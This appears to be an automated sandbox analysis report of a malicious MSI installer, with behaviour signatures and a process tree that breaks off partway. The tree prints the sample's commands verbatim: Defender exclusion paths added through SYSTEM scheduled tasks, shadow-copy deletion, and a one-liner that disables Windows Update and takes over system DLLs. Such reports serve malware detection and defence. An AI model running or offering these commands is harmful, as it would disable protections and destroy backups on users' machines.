Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    31/07/2026, 10:51

General

  • Target
    install_mal010.msi
  • Size 8.1MB
  • Sample260731-mxv7gs1cqh
  • SHA256 ade315680071e86ff610d0e11f97042245ec40d3f31ec4eca6a970e84861b0d2
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 27 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal010.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1568
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:692
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 202DE8D66F7CC77B47DD70241E348302 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1776
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3424
  • C:\Users\Public\4Lf89e\aIDPCH.exe
    C:\Users\Public\4Lf89e\aIDPCH.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\4Lf89e\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      PID:5048
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\4Lf89e\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3820
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4484
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3392
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4624
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3348
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1168
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3948
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2864
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1260
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5040
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:432
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3416
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:984
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3584
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:4140
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2868
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2072
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4544
                        • C:\Program Files (x86)\n4aPkw\n4aPkw.exe
                          "C:\Program Files (x86)\n4aPkw\n4aPkw.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:2888
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:2132
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1872
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\n4aPkw" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1440
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:176
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\n4aPkw\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4848
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\n4aPkw\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2100
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:60
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3416
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2848
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:4200
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3576
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4748
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2072
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3268
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop UsoSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2284
                              • C:\Windows\SysWOW64\sc.exe
                                sc config UsoSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1968
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure UsoSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                PID:4700
                              • C:\Windows\SysWOW64\net.exe
                                net stop uhssvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3688
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop uhssvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4084
                              • C:\Windows\SysWOW64\sc.exe
                                sc config uhssvc start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:2124
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure uhssvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4856
                              • C:\Windows\SysWOW64\net.exe
                                net stop WaaSMedicSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1568
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1224
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WaaSMedicSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:3380
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure WaaSMedicSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:176
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:2420
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2228
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4188
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:3324
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\wuaueng.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4328
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1852
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2480
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:3928
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1688
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1096
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3376
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                PID:2384
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:4212
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:3820
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4648
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:3428
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2464
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:1904
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3896
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1380
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4704
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1948
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                3⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:1760
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\n4aPkw" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:4312
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:2084
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2360
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4644
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:216
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:2104
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\n4aPkw" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:5028
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:220
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2152
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                    PID:4528
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3572
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:4220
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4764
                                • C:\Windows\SysWOW64\cmd.exe
